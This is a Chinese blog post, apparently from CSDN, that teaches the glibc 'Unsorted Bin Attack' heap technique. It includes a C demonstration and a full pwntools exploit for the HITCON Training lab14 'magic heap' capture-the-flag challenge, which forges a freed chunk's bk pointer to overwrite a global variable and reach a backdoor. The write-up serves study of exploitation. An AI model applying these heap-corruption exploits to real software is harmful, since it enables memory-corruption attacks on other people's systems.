Unsorted Bin Attack

最新推荐文章于 2022-09-16 14:28:18 发布
最新推荐文章于 2022-09-16 14:28:18 发布
阅读量409 收藏
点赞数 1
分类专栏: heap_related
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45595732/article/details/110181173
版权

Unsorted Bin Attack

Unsorted Bin Attack 被利用的前提 -------------控制 Unsorted Bin Chunk 的 bk 指针。

Unsorted Bin Attack 可以达到的效果 -------------实现修改任意地址值为一个较大的数值。

Unsorted bin的来源

1,当一个较大的 chunk 被分割成两半后,如果剩下的部分大于MINSIZE,就会被放到 unsorted bin 中。

2,释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中。

3,当进行malloc_consolidate 时,可能会把合并后的 chunk 放到 unsorted bin 中,如果不是和 top chunk 近邻的话。

主要涉及到的代码
          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);
演示代码
#include <stdio.h>
#include <stdlib.h>

int main() {
  unsigned long target_var = 0;
  unsigned long *p = malloc(400);
  malloc(500);//防止p指向的chunk和top chunk合并
  free(p);
  p[1] = (unsigned long)(&target_var - 2);//伪造p->bk
  malloc(400);
  fprintf(stderr, "%p: %p\n", &target_var, (void *)target_var);
}

其执行的过程

在这里插入图片描述

此处结果是target_var的值变成了unsorted bin的地址。

**可以看出,在将 unsorted bin 的最后一个 chunk 拿出来的过程中,victim 的 fd 并没有发挥作用,所以即使我们修改了其为一个不合法的值也没有关系。**然而,需要注意的是,unsorted bin 链表可能就此破坏,在插入 chunk 时,可能会出现问题。

例1 HITCON Training lab14 magic heap

链接

main函数逻辑

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char *v3; // rsi
  const char *v4; // rdi
  int v5; // eax
  char buf; // [rsp+0h] [rbp-10h]
  unsigned __int64 v7; // [rsp+8h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  setvbuf(stdout, 0LL, 2, 0LL);
  v3 = 0LL;
  v4 = stdin;
  setvbuf(stdin, 0LL, 2, 0LL);
  while ( 1 )
  {
    while ( 1 )
    {
      menu(v4, v3);
      v3 = &buf;
      read(0, &buf, 8uLL);
      v4 = &buf;
      v5 = atoi(&buf);
      if ( v5 != 3 )
        break;
      delete_heap(&buf, &buf);
    }
    if ( v5 > 3 )
    {
      if ( v5 == 4 )
        exit(0);
      if ( v5 == 4869 )
      {
        if ( magic <= 0x1305 )
        {
          v4 = "So sad !";
          puts("So sad !");
        }
        else
        {
          v4 = "Congrt !";
          puts("Congrt !");
          l33t();
        }
      }
      else
      {
LABEL_17:
        v4 = "Invalid Choice";
        puts("Invalid Choice");
      }
    }
    else if ( v5 == 1 )
    {
      create_heap(&buf, &buf);
    }
    else
    {
      if ( v5 != 2 )
        goto LABEL_17;
      edit_heap(&buf, &buf);
    }
  }
}

程序主要功能

在这里插入图片描述

这里可以看到,只要修改magic为一个比较大的值就可以直接执行后门函数。伪造和演示程序一模一样。edit函数存在溢出可以直接修改相邻chunk的数据。

在这里插入图片描述

exp

from pwn import*
context.log_level = 'debug'
p = process('./magicheap')

def create(size,content):
	p.sendlineafter('choice :','1')
	p.sendlineafter('Heap : ',str(size))
	p.sendafter('heap:',content)
def edit(index,size,content):
	p.sendlineafter('choice :','2')
	p.sendlineafter('Index :',str(index))
	p.sendlineafter('Heap : ',str(size))
	p.sendafter('heap : ',content)
def delete(index):
	p.sendlineafter('choice :','3')
	p.sendlineafter('Index :',str(index))

magic = 0x6020C0
create(0x20,'\x00')
create(0x80,'\x00')
create(0x80,'\x00')
delete(1)

edit(0,0x40,'a'*0x20+p64(0)+p64(0x91)+p64(0)+p64(magic-0x10))
gdb.attach(p)
create(0x80,'\x00')
p.recvuntil(":")
p.sendline("4869")
p.interactive()
TTYflag
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
unsigned long long 溢出 乘_二进制安全之堆溢出(系列)—— unsorted bin attack
weixin_39611754的博客
11-30 81
本文是二进制安全之堆溢出系列的第十章节,主要介绍unsorted bin attack。原理实现效果只能在任意地址写入一个大数 通常在一个地址写入7f,然后配合fastbin attack使用,达到任意地址写的效果断链操作/* remove from unsorted list */ bck = victim->bk unsorted_chunks (av)->bk = bck; ...
CTF pwn题堆入门 -- Unsorted bin
lifanxin的博客
04-08 3035
Unsorted bin概述攻击方式泄露libc地址总结 概述   Unsorted bin也是堆题中常见的,当一个堆块被释放时,且该堆块大小不属于fast bin(libc-2.26之后要填满tcache),那么在进入small bin和large bin之前,都是先加入到unsorted bin的。之后当我们再次分配内存到unsorted bin上寻找时,如果申请的内存堆块小于寻找的unsorted bin,那么会将该内存块切割后返回给用户,剩下的仍然保存在unsorted bin上;如果申请的内存堆块
unstored bins attack
m0_62326489的博客
08-22 219
h
hitcontraining magicheap
pondzhang的专栏
06-16 351
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
UnsortedBin Attack
yms0211的博客
09-13 900
Unsorted Bin Attack
堆漏洞挖掘——unsortedbin attack漏洞
董哥的黑板报
08-13 3145
一、核心思想 实现在任意地址写一个数值 局限性:通常unsortedbin attack只能够在目标地址写一个大数值 unsortedbin attack通常是为了配合fastbin attack而使用的 fastbin attack见文章:https://blog.csdn.net/qq_41453285/article/details/99315504 二、原理图解 当从unsor...
hitcontraining_lab14学习(以及Unsorted Bin的个人理解
a2590035252的博客
09-16 1393
适合和我一样的菜鸡pwner
好好说话之Unsorted Bin Attack
hollk’s blog
01-15 3201
Unsorted Bin Attack很简单,序言就不多说了,直接看本文讲解就好,抓紧时间把wiki写完,我要去搞IOT固件分析了!!!!
【PWN】Unsorted bin与Large binAttack
u014377094的博客
05-03 764
今天继续整理攻击方法,逆水行舟,不进则退。 Unsorted bin attack与Large bin attack两者我还是放在一起了,因为两者相近,都是通过修改bk(bk_nextsize)来实现对一块区域的修改,漏洞在于缺少*(bk)->fd的检测。 unsortedbin的利用点 /* remove from unsorted list */ if (__glibc_unlikely (bck->fd != victim))
javalruleetcode-leetcode-unsorted:leetcode未排序
06-29
java lru leetcode 力码 # 标题 解决方案 运行 22 31 1 毫秒 42 1 毫秒 46 2 毫秒 47 1 毫秒 56 5 毫秒 93 11 毫秒 103 1 毫秒 124 1 毫秒 128 6 毫秒 146 12 毫秒 150 5 毫秒 153 0 毫秒 199 ...毫秒
Smallest-Difference-In-Unsorted-Arrays
04-20
最小差异的未排序数组用Java实现
Unsorted-Notes:在这里放下随机笔记
04-05
指数目录第1章-好零件第2章-语法第3章-对象第四章-功能第5章-继承第6章-数组第7章-正则表达式第8章-方法第9章-风格第10章-美丽的功能附录A-糟糕的部分附录B-不良零件附录C-JSLint第1章-好零件大多数编程语言包含好的...
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
find_max_element_in_unsorted_LL_iterative
04-17
find_max_element_in_unsorted_LL_iterative问题: class ListNode { constructor(value = 0, next = null) { this.value = value this.next = next }} function findMax(head) { // Write your code here....
Python基于PyQt5和SMTP协议实现邮件发送程序案例源码.7z
04-17
该程序采用了Python的smtplib模块和pyqt5模块,实现了自动登录QQ邮箱的功能,并且支持向其他QQ邮箱或如网易邮箱等其他类型的邮箱发送文本邮件和附带文件的邮件。
2024年全球胚胎移植玻璃化冷冻介质行业总体规模、主要企业国内外市场占有率及排名.docx
04-17
2024年全球胚胎移植玻璃化冷冻介质行业总体规模、主要企业国内外市场占有率及排名
多式联运 (1).zip
04-17
多式联运 (1)
sklearn中决策树算法进行泰坦尼克号人员幸存预测
04-17
sklearn中决策树算法进行泰坦尼克号人员幸存预测 有包的导入、数据处理、特征提取、预测结果等
编译原理实验报告(1和2)(可运行).zip
最新发布
04-17
编译原理实验报告(1和2)(可运行)
fast bin、small bin、unsorted bin large bin的区别与共同点
07-15
快速块(fast bin)、小型块(small bin)、未排序块(unsorted bin)和大型块(large bin)是堆管理中不同的内存块分类。它们有一些区别和共同点,如下所示: 区别: 1. 大小范围:快速块是一组固定大小的小块,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值